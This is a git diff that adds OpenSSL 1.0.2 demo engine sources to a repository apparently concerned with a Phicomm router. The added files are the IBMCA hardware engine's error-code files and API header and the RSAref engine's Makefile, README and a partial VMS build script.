+#  ifndef OPENSSL_NO_DH
+/* This function is aliased to mod_exp (with the dh and mont dropped). */
+static int ibmca_mod_exp_dh(DH const *dh, BIGNUM *r,
+                            const BIGNUM *a, const BIGNUM *p,
+                            const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx)
+{
+    return ibmca_mod_exp(r, a, p, m, ctx);
+}
+#  endif
+
+/* Random bytes are good */
+static int ibmca_rand_bytes(unsigned char *buf, int num)
+{
+    int to_return = 0;          /* assume failure */
+    unsigned int ret;
+
+    if (handle == 0) {
+        IBMCAerr(IBMCA_F_IBMCA_RAND_BYTES, IBMCA_R_NOT_INITIALISED);
+        goto err;
+    }
+
+    ret = p_icaRandomNumberGenerate(handle, num, buf);
+    if (ret < 0) {
+        IBMCAerr(IBMCA_F_IBMCA_RAND_BYTES, IBMCA_R_REQUEST_FAILED);
+        goto err;
+    }
+    to_return = 1;
+ err:
+    return to_return;
+}
+
+static int ibmca_rand_status(void)
+{
+    return 1;
+}
+
+/*
+ * This stuff is needed if this ENGINE is being compiled into a
+ * self-contained shared-library.
+ */
+#  ifdef ENGINE_DYNAMIC_SUPPORT
+static int bind_fn(ENGINE *e, const char *id)
+{
+    if (id && (strcmp(id, engine_ibmca_id) != 0)) /* WJH XXX */
+        return 0;
+    if (!bind_helper(e))
+        return 0;
+    return 1;
+}
+
+IMPLEMENT_DYNAMIC_CHECK_FN()
+    IMPLEMENT_DYNAMIC_BIND_FN(bind_fn)
+#  endif                        /* ENGINE_DYNAMIC_SUPPORT */
+# endif                         /* !OPENSSL_NO_HW_IBMCA */
+#endif                          /* !OPENSSL_NO_HW */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/ibmca/hw_ibmca.ec b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/ibmca/hw_ibmca.ec
new file mode 100644
index 0000000..f68646d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/ibmca/hw_ibmca.ec
@@ -0,0 +1,8 @@
+# configuration file for util/mkerr.pl
+#
+# use like this:
+#
+#	perl ../../../util/mkerr.pl -conf hw_ibmca.ec \
+#		-nostatic -staticloader -write *.c
+
+L IBMCA		hw_ibmca_err.h			hw_ibmca_err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/ibmca/hw_ibmca_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/ibmca/hw_ibmca_err.c
new file mode 100644
index 0000000..9bcb800
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/ibmca/hw_ibmca_err.c
@@ -0,0 +1,149 @@
+/* hw_ibmca_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include "hw_ibmca_err.h"
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+static ERR_STRING_DATA IBMCA_str_functs[] = {
+    {ERR_PACK(0, IBMCA_F_IBMCA_CTRL, 0), "IBMCA_CTRL"},
+    {ERR_PACK(0, IBMCA_F_IBMCA_FINISH, 0), "IBMCA_FINISH"},
+    {ERR_PACK(0, IBMCA_F_IBMCA_INIT, 0), "IBMCA_INIT"},
+    {ERR_PACK(0, IBMCA_F_IBMCA_MOD_EXP, 0), "IBMCA_MOD_EXP"},
+    {ERR_PACK(0, IBMCA_F_IBMCA_MOD_EXP_CRT, 0), "IBMCA_MOD_EXP_CRT"},
+    {ERR_PACK(0, IBMCA_F_IBMCA_RAND_BYTES, 0), "IBMCA_RAND_BYTES"},
+    {ERR_PACK(0, IBMCA_F_IBMCA_RSA_MOD_EXP, 0), "IBMCA_RSA_MOD_EXP"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA IBMCA_str_reasons[] = {
+    {IBMCA_R_ALREADY_LOADED, "already loaded"},
+    {IBMCA_R_BN_CTX_FULL, "bn ctx full"},
+    {IBMCA_R_BN_EXPAND_FAIL, "bn expand fail"},
+    {IBMCA_R_CTRL_COMMAND_NOT_IMPLEMENTED, "ctrl command not implemented"},
+    {IBMCA_R_DSO_FAILURE, "dso failure"},
+    {IBMCA_R_MEXP_LENGTH_TO_LARGE, "mexp length to large"},
+    {IBMCA_R_MISSING_KEY_COMPONENTS, "missing key components"},
+    {IBMCA_R_NOT_INITIALISED, "not initialised"},
+    {IBMCA_R_NOT_LOADED, "not loaded"},
+    {IBMCA_R_OPERANDS_TO_LARGE, "operands to large"},
+    {IBMCA_R_OUTLEN_TO_LARGE, "outlen to large"},
+    {IBMCA_R_REQUEST_FAILED, "request failed"},
+    {IBMCA_R_UNDERFLOW_CONDITION, "underflow condition"},
+    {IBMCA_R_UNDERFLOW_KEYRECORD, "underflow keyrecord"},
+    {IBMCA_R_UNIT_FAILURE, "unit failure"},
+    {0, NULL}
+};
+
+#endif
+
+#ifdef IBMCA_LIB_NAME
+static ERR_STRING_DATA IBMCA_lib_name[] = {
+    {0, IBMCA_LIB_NAME},
+    {0, NULL}
+};
+#endif
+
+static int IBMCA_lib_error_code = 0;
+static int IBMCA_error_init = 1;
+
+static void ERR_load_IBMCA_strings(void)
+{
+    if (IBMCA_lib_error_code == 0)
+        IBMCA_lib_error_code = ERR_get_next_error_library();
+
+    if (IBMCA_error_init) {
+        IBMCA_error_init = 0;
+#ifndef OPENSSL_NO_ERR
+        ERR_load_strings(IBMCA_lib_error_code, IBMCA_str_functs);
+        ERR_load_strings(IBMCA_lib_error_code, IBMCA_str_reasons);
+#endif
+
+#ifdef IBMCA_LIB_NAME
+        IBMCA_lib_name->error = ERR_PACK(IBMCA_lib_error_code, 0, 0);
+        ERR_load_strings(0, IBMCA_lib_name);
+#endif
+    }
+}
+
+static void ERR_unload_IBMCA_strings(void)
+{
+    if (IBMCA_error_init == 0) {
+#ifndef OPENSSL_NO_ERR
+        ERR_unload_strings(IBMCA_lib_error_code, IBMCA_str_functs);
+        ERR_unload_strings(IBMCA_lib_error_code, IBMCA_str_reasons);
+#endif
+
+#ifdef IBMCA_LIB_NAME
+        ERR_unload_strings(0, IBMCA_lib_name);
+#endif
+        IBMCA_error_init = 1;
+    }
+}
+
+static void ERR_IBMCA_error(int function, int reason, char *file, int line)
+{
+    if (IBMCA_lib_error_code == 0)
+        IBMCA_lib_error_code = ERR_get_next_error_library();
+    ERR_PUT_error(IBMCA_lib_error_code, function, reason, file, line);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/ibmca/hw_ibmca_err.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/ibmca/hw_ibmca_err.h
new file mode 100644
index 0000000..c17e0c9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/ibmca/hw_ibmca_err.h
@@ -0,0 +1,103 @@
+/* ====================================================================
+ * Copyright (c) 2001-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_IBMCA_ERR_H
+# define HEADER_IBMCA_ERR_H
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+static void ERR_load_IBMCA_strings(void);
+static void ERR_unload_IBMCA_strings(void);
+static void ERR_IBMCA_error(int function, int reason, char *file, int line);
+# define IBMCAerr(f,r) ERR_IBMCA_error((f),(r),__FILE__,__LINE__)
+
+/* Error codes for the IBMCA functions. */
+
+/* Function codes. */
+# define IBMCA_F_IBMCA_CTRL                               100
+# define IBMCA_F_IBMCA_FINISH                             101
+# define IBMCA_F_IBMCA_INIT                               102
+# define IBMCA_F_IBMCA_MOD_EXP                            103
+# define IBMCA_F_IBMCA_MOD_EXP_CRT                        104
+# define IBMCA_F_IBMCA_RAND_BYTES                         105
+# define IBMCA_F_IBMCA_RSA_MOD_EXP                        106
+
+/* Reason codes. */
+# define IBMCA_R_ALREADY_LOADED                           100
+# define IBMCA_R_BN_CTX_FULL                              101
+# define IBMCA_R_BN_EXPAND_FAIL                           102
+# define IBMCA_R_CTRL_COMMAND_NOT_IMPLEMENTED             103
+# define IBMCA_R_DSO_FAILURE                              104
+# define IBMCA_R_MEXP_LENGTH_TO_LARGE                     105
+# define IBMCA_R_MISSING_KEY_COMPONENTS                   106
+# define IBMCA_R_NOT_INITIALISED                          107
+# define IBMCA_R_NOT_LOADED                               108
+# define IBMCA_R_OPERANDS_TO_LARGE                        109
+# define IBMCA_R_OUTLEN_TO_LARGE                          110
+# define IBMCA_R_REQUEST_FAILED                           111
+# define IBMCA_R_UNDERFLOW_CONDITION                      112
+# define IBMCA_R_UNDERFLOW_KEYRECORD                      113
+# define IBMCA_R_UNIT_FAILURE                             114
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/ibmca/ica_openssl_api.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/ibmca/ica_openssl_api.h
new file mode 100644
index 0000000..715bb92
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/ibmca/ica_openssl_api.h
@@ -0,0 +1,183 @@
+
+#ifndef __ICA_OPENSSL_API_H__
+# define __ICA_OPENSSL_API_H__
+
+/**
+ ** abstract data types for API
+ **/
+
+# define ICA_ADAPTER_HANDLE int
+
+# if defined(linux) || defined (_AIX)
+#  define ICA_CALL
+# endif
+
+# if defined(WIN32) || defined(_WIN32)
+#  define ICA_CALL  __stdcall
+# endif
+
+/* -----------------------------------------------*
+ | RSA defines and typedefs                       |
+ *------------------------------------------------*/
+ /*
+  * All data elements of the RSA key are in big-endian format
+  * Modulus-Exponent form of key
+  *
+  */
+# define MAX_EXP_SIZE 256
+# define MAX_MODULUS_SIZE 256
+# define MAX_MODEXP_SIZE  (MAX_EXP_SIZE + MAX_MODULUS_SIZE)
+
+# define MAX_OPERAND_SIZE  MAX_EXP_SIZE
+
+typedef unsigned char ICA_KEY_RSA_MODEXPO_REC[MAX_MODEXP_SIZE];
+ /*
+  * All data elements of the RSA key are in big-endian format
+  * Chinese Remainder Thereom(CRT) form of key
+  * Used only for Decrypt, the encrypt form is typically Modulus-Exponent
+  *
+  */
+# define MAX_BP_SIZE 136
+# define MAX_BQ_SIZE 128
+# define MAX_NP_SIZE 136
+# define MAX_NQ_SIZE 128
+# define MAX_QINV_SIZE 136
+# define MAX_RSACRT_SIZE (MAX_BP_SIZE+MAX_BQ_SIZE+MAX_NP_SIZE+MAX_NQ_SIZE+MAX_QINV_SIZE)
+
+# define RSA_GEN_OPERAND_MAX   256/* bytes */
+
+typedef unsigned char ICA_KEY_RSA_CRT_REC[MAX_RSACRT_SIZE];
+/* -----------------------------------------------*
+ | RSA key token types                            |
+ *------------------------------------------------*/
+
+# define  RSA_PUBLIC_MODULUS_EXPONENT        3
+# define  RSA_PKCS_PRIVATE_CHINESE_REMAINDER 6
+
+# define KEYTYPE_MODEXPO         1
+# define KEYTYPE_PKCSCRT         2
+
+/* -----------------------------------------------*
+ | RSA Key Token format                           |
+ *------------------------------------------------*/
+
+/*-
+ * NOTE:  All the fields in the ICA_KEY_RSA_MODEXPO structure
+ *        (lengths, offsets, exponents, modulus, etc.) are
+ *        stored in big-endian format
+ */
+
+typedef struct _ICA_KEY_RSA_MODEXPO {
+    unsigned int keyType;       /* RSA key type.  */
+    unsigned int keyLength;     /* Total length of the token.  */
+    unsigned int modulusBitLength; /* Modulus n bit length.  */
+    /* -- Start of the data length. */
+    unsigned int nLength;       /* Modulus n = p * q */
+    unsigned int expLength;     /* exponent (public or private) */
+    /*   e = 1/d * mod(p-1)(q-1)   */
+    /* -- Start of the data offsets */
+    unsigned int nOffset;       /* Modulus n .  */
+    unsigned int expOffset;     /* exponent (public or private) */
+    unsigned char reserved[112]; /* reserved area */
+    /* -- Start of the variable -- */
+    /* -- length token data.    -- */
+    ICA_KEY_RSA_MODEXPO_REC keyRecord;
+} ICA_KEY_RSA_MODEXPO;
+# define SZ_HEADER_MODEXPO (sizeof(ICA_KEY_RSA_MODEXPO) - sizeof(ICA_KEY_RSA_MODEXPO_REC))
+
+/*-
+ * NOTE:  All the fields in the ICA_KEY_RSA_CRT structure
+ *        (lengths, offsets, exponents, modulus, etc.) are
+ *        stored in big-endian format
+ */
+
+typedef struct _ICA_KEY_RSA_CRT {
+    unsigned int keyType;       /* RSA key type.  */
+    unsigned int keyLength;     /* Total length of the token.  */
+    unsigned int modulusBitLength; /* Modulus n bit length.  */
+    /* -- Start of the data length. */
+# if _AIX
+    unsigned int nLength;       /* Modulus n = p * q */
+# endif
+    unsigned int pLength;       /* Prime number p .  */
+    unsigned int qLength;       /* Prime number q .  */
+    unsigned int dpLength;      /* dp = d * mod(p-1) .  */
+    unsigned int dqLength;      /* dq = d * mod(q-1) .  */
+    unsigned int qInvLength;    /* PKCS: qInv = Ap/q */
+    /* -- Start of the data offsets */
+# if _AIX
+    unsigned int nOffset;       /* Modulus n .  */
+# endif
+    unsigned int pOffset;       /* Prime number p .  */
+    unsigned int qOffset;       /* Prime number q .  */
+    unsigned int dpOffset;      /* dp .  */
+    unsigned int dqOffset;      /* dq .  */
+    unsigned int qInvOffset;    /* qInv for PKCS */
+# if _AIX
+    unsigned char reserved[80]; /* reserved area */
+# else
+    unsigned char reserved[88]; /* reserved area */
+# endif
+    /* -- Start of the variable -- */
+    /* -- length token data.    -- */
+    ICA_KEY_RSA_CRT_REC keyRecord;
+} ICA_KEY_RSA_CRT;
+# define SZ_HEADER_CRT (sizeof(ICA_KEY_RSA_CRT) - sizeof(ICA_KEY_RSA_CRT_REC))
+
+unsigned int
+icaOpenAdapter(unsigned int adapterId, ICA_ADAPTER_HANDLE * pAdapterHandle);
+
+unsigned int icaCloseAdapter(ICA_ADAPTER_HANDLE adapterHandle);
+
+unsigned int
+icaRsaModExpo(ICA_ADAPTER_HANDLE hAdapterHandle,
+              unsigned int inputDataLength,
+              unsigned char *pInputData,
+              ICA_KEY_RSA_MODEXPO *pKeyModExpo,
+              unsigned int *pOutputDataLength, unsigned char *pOutputData);
+
+unsigned int
+icaRsaCrt(ICA_ADAPTER_HANDLE hAdapterHandle,
+          unsigned int inputDataLength,
+          unsigned char *pInputData,
+          ICA_KEY_RSA_CRT *pKeyCrt,
+          unsigned int *pOutputDataLength, unsigned char *pOutputData);
+
+unsigned int
+icaRandomNumberGenerate(ICA_ADAPTER_HANDLE hAdapterHandle,
+                        unsigned int outputDataLength,
+                        unsigned char *pOutputData);
+
+/*
+ * Specific macros and definitions to not have IFDEF;s all over the main code
+ */
+
+# if (_AIX)
+static const char *IBMCA_LIBNAME = "/lib/libica.a(shr.o)";
+# elif (WIN32)
+static const char *IBMCA_LIBNAME = "cryptica";
+# else
+static const char *IBMCA_LIBNAME = "ica";
+# endif
+
+# if (WIN32)
+/*
+ * The ICA_KEY_RSA_MODEXPO & ICA_KEY_RSA_CRT lengths and offsets must be in
+ * big-endian format.
+ *
+ */
+#  define CORRECT_ENDIANNESS(b) (  \
+                             (((unsigned long) (b) & 0x000000ff) << 24) |  \
+                             (((unsigned long) (b) & 0x0000ff00) <<  8) |  \
+                             (((unsigned long) (b) & 0x00ff0000) >>  8) |  \
+                             (((unsigned long) (b) & 0xff000000) >> 24)    \
+                             )
+#  define CRT_KEY_TYPE   RSA_PKCS_PRIVATE_CHINESE_REMAINDER
+#  define ME_KEY_TYPE    RSA_PUBLIC_MODULUS_EXPONENT
+# else
+#  define CORRECT_ENDIANNESS(b) (b)
+#  define CRT_KEY_TYPE       KEYTYPE_PKCSCRT
+#  define ME_KEY_TYPE        KEYTYPE_MODEXPO
+# endif
+
+#endif                          /* __ICA_OPENSSL_API_H__ */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/rsaref/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/rsaref/Makefile
new file mode 100644
index 0000000..63b8c79
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/rsaref/Makefile
@@ -0,0 +1,135 @@
+LIBNAME=	librsaref
+SRC=		rsaref.c
+OBJ=		rsaref.o
+HEADER=		rsaref.h
+
+CC=		gcc
+PIC=		-fPIC
+CFLAGS=		-g -I../../../include $(PIC) -DENGINE_DYNAMIC_SUPPORT
+AR=		ar r
+RANLIB=		ranlib
+
+LIB=		$(LIBNAME).a
+SHLIB=		$(LIBNAME).so
+
+all:
+		@echo 'Please choose a system to build on:'
+		@echo ''
+		@echo 'tru64:    Tru64 Unix, Digital Unix, Digital OSF/1'
+		@echo 'solaris:  Solaris'
+		@echo 'irix:     IRIX'
+		@echo 'hpux32:   32-bit HP/UX'
+		@echo 'hpux64:   64-bit HP/UX'
+		@echo 'aix:      AIX'
+		@echo 'gnu:      Generic GNU-based system (gcc and GNU ld)'
+		@echo ''
+
+FORCE.install:
+install:	FORCE.install
+		cd install; \
+			make -f unix/makefile CFLAGS='-I. -DPROTOTYPES=1 -O -c' RSAREFLIB=librsaref.a librsaref.a
+
+FORCE.update:
+update:		FORCE.update
+		perl ../../../util/mkerr.pl -conf rsaref.ec \
+			-nostatic -staticloader -write rsaref.c
+
+darwin:		install $(SHLIB).darwin
+cygwin:		install $(SHLIB).cygwin
+gnu:		install $(SHLIB).gnu
+alpha-osf1:	install $(SHLIB).alpha-osf1
+tru64:		install $(SHLIB).tru64
+solaris:	install $(SHLIB).solaris
+irix:		install $(SHLIB).irix
+hpux32:		install $(SHLIB).hpux32
+hpux64:		install $(SHLIB).hpux64
+aix:		install $(SHLIB).aix
+reliantunix:	install $(SHLIB).reliantunix
+
+$(LIB):		$(OBJ)
+		$(AR) $(LIB) $(OBJ)
+		- $(RANLIB) $(LIB)
+
+LINK_SO=	\
+  ld -r -o $(LIBNAME).o $$ALLSYMSFLAGS $(LIB) install/librsaref.a && \
+  (nm -Pg $(LIBNAME).o | grep ' [BDT] ' | cut -f1 -d' ' > $(LIBNAME).exp; \
+   $$SHAREDCMD $$SHAREDFLAGS -o $(SHLIB) $(LIBNAME).o -L ../../.. -lcrypto -lc)
+
+$(SHLIB).darwin:	$(LIB) install/librsaref.a
+		ALLSYMSFLAGS='-all_load' \
+		SHAREDFLAGS='-dynamiclib -install_name $(SHLIB)' \
+		SHAREDCMD='$(CC)'; \
+		$(LINK_SO)
+		touch $(SHLIB).darwin
+$(SHLIB).cygwin:	$(LIB) install/librsaref.a
+		ALLSYMSFLAGS='--whole-archive' \
+		SHAREDFLAGS='-shared -Wl,-Bsymbolic -Wl,--out-implib,$(LIBNAME).dll.a' \
+		SHAREDCMD='$(CC)'; \
+		$(LINK_SO)
+		touch $(SHLIB).cygwin
+$(SHLIB).gnu:	$(LIB) install/librsaref.a
+		ALLSYMSFLAGS='--whole-archive' \
+		SHAREDFLAGS='-shared -Wl,-soname=$(SHLIB)' \
+		SHAREDCMD='$(CC)'; \
+		$(LINK_SO)
+		touch $(SHLIB).gnu
+$(SHLIB).tru64:	$(LIB) install/librsaref.a
+		ALLSYMSFLAGS='-all' \
+		SHAREDFLAGS='-shared' \
+		SHAREDCMD='$(CC)'; \
+		$(LINK_SO)
+		touch $(SHLIB).tru64
+$(SHLIB).solaris:	$(LIB) install/librsaref.a
+		ALLSYMSFLAGS='-z allextract' \
+		SHAREDFLAGS='-G -h $(SHLIB)' \
+		SHAREDCMD='$(CC)'; \
+		$(LINK_SO)
+		touch $(SHLIB).solaris
+$(SHLIB).irix:	$(LIB) install/librsaref.a
+		ALLSYMSFLAGS='-all' \
+		SHAREDFLAGS='-shared -Wl,-soname,$(SHLIB)' \
+		SHAREDCMD='$(CC)'; \
+		$(LINK_SO)
+		touch $(SHLIB).irix
+$(SHLIB).hpux32:	$(LIB) install/librsaref.a
+		ALLSYMSFLAGS='-Fl' \
+		SHAREDFLAGS='+vnocompatwarnings -b -z +s +h $(SHLIB)' \
+		SHAREDCMD='/usr/ccs/bin/ld'; \
+		$(LINK_SO)
+		touch $(SHLIB).hpux32
+$(SHLIB).hpux64:	$(LIB) install/librsaref.a
+		ALLSYMSFLAGS='+forceload' \
+		SHAREDFLAGS='-b -z +h $(SHLIB)' \
+		SHAREDCMD='/usr/ccs/bin/ld'; \
+		$(LINK_SO)
+		touch $(SHLIB).hpux64
+$(SHLIB).aix:	$(LIB) install/librsaref.a
+		ALLSYMSFLAGS='-bnogc' \
+		SHAREDFLAGS='-G -bE:$(LIBNAME).exp -bM:SRE' \
+		SHAREDCMD='$(CC)'; \
+		$(LINK_SO)
+		touch $(SHLIB).aix
+
+depend:
+		sed -e '/^# DO NOT DELETE.*/,$$d' < Makefile > Makefile.tmp
+		echo '# DO NOT DELETE THIS LINE -- make depend depends on it.' >> Makefile.tmp
+		gcc -M $(CFLAGS) $(SRC) >> Makefile.tmp
+		perl ../../../util/clean-depend.pl < Makefile.tmp > Makefile.new
+		rm -f Makefile.tmp Makefile
+		mv Makefile.new Makefile
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+rsaref.o: ../../../include/openssl/asn1.h ../../../include/openssl/bio.h
+rsaref.o: ../../../include/openssl/bn.h ../../../include/openssl/crypto.h
+rsaref.o: ../../../include/openssl/dh.h ../../../include/openssl/dsa.h
+rsaref.o: ../../../include/openssl/e_os2.h ../../../include/openssl/engine.h
+rsaref.o: ../../../include/openssl/err.h ../../../include/openssl/lhash.h
+rsaref.o: ../../../include/openssl/opensslconf.h
+rsaref.o: ../../../include/openssl/opensslv.h
+rsaref.o: ../../../include/openssl/ossl_typ.h ../../../include/openssl/rand.h
+rsaref.o: ../../../include/openssl/rsa.h ../../../include/openssl/safestack.h
+rsaref.o: ../../../include/openssl/stack.h ../../../include/openssl/symhacks.h
+rsaref.o: ../../../include/openssl/ui.h rsaref.c rsaref_err.c rsaref_err.h
+rsaref.o: source/des.h source/global.h source/md2.h source/md5.h source/rsa.h
+rsaref.o: source/rsaref.h
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/rsaref/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/rsaref/README
new file mode 100644
index 0000000..00b1f74
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/rsaref/README
@@ -0,0 +1,22 @@
+librsaref.so is a demonstration dynamic engine that does RSA
+operations using the old RSAref 2.0 implementation.
+
+To make proper use of this engine, you must download RSAref 2.0
+(search the web for rsaref.tar.Z for example) and unpack it in this
+directory, so you'll end up having the subdirectories "install" and
+"source" among others.
+
+To build, do the following:
+
+	make
+
+This will list a number of available targets to choose from.  Most of
+them are architecture-specific.  The exception is "gnu" which is to be
+used on systems where GNU ld and gcc have been installed in such a way
+that gcc uses GNU ld to link together programs and shared libraries.
+
+The make file assumes you use gcc.  To change that, just reassign CC:
+
+	make CC=cc
+
+The result is librsaref.so, which you can copy to any place you wish.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/rsaref/build.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/rsaref/build.com
new file mode 100644
index 0000000..72b013d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/rsaref/build.com
@@ -0,0 +1,105 @@
+$! BUILD.COM -- Building procedure for the RSAref engine
+$
+$	if f$search("source.dir") .eqs. "" -
+	   .or. f$search("install.dir") .eqs. ""
+$	then
+$	    write sys$error "RSAref 2.0 hasn't been properly extracted."
+$	    exit
+$	endif
+$
+$	if (f$getsyi("cpu").lt.128)
+$	then
+$	    arch := vax
+$	else
+$	    arch = f$edit( f$getsyi( "ARCH_NAME"), "UPCASE")
+$	    if (arch .eqs. "") then arch = "UNK"
+$	endif
+$
+$	_save_default = f$environment("default")
+$	set default [.install]
+$	files := desc,digit,md2c,md5c,nn,prime,-
+		rsa,r_encode,r_dh,r_enhanc,r_keygen,r_random,-
+		r_stdlib
+$	delete rsaref.olb;*
+$	library/create/object rsaref.olb
+$	files_i = 0
+$ rsaref_loop:
+$	files_e = f$edit(f$element(files_i,",",files),"trim")
+$	files_i = files_i + 1
+$	if files_e .eqs. "," then goto rsaref_loop_end
+$	cc/include=([-.source],[])/define=PROTOTYPES=1/object=[]'files_e'.obj -
+		[-.source]'files_e'.c
+$	library/replace/object rsaref.olb 'files_e'.obj
+$	goto rsaref_loop
+$ rsaref_loop_end:
+$
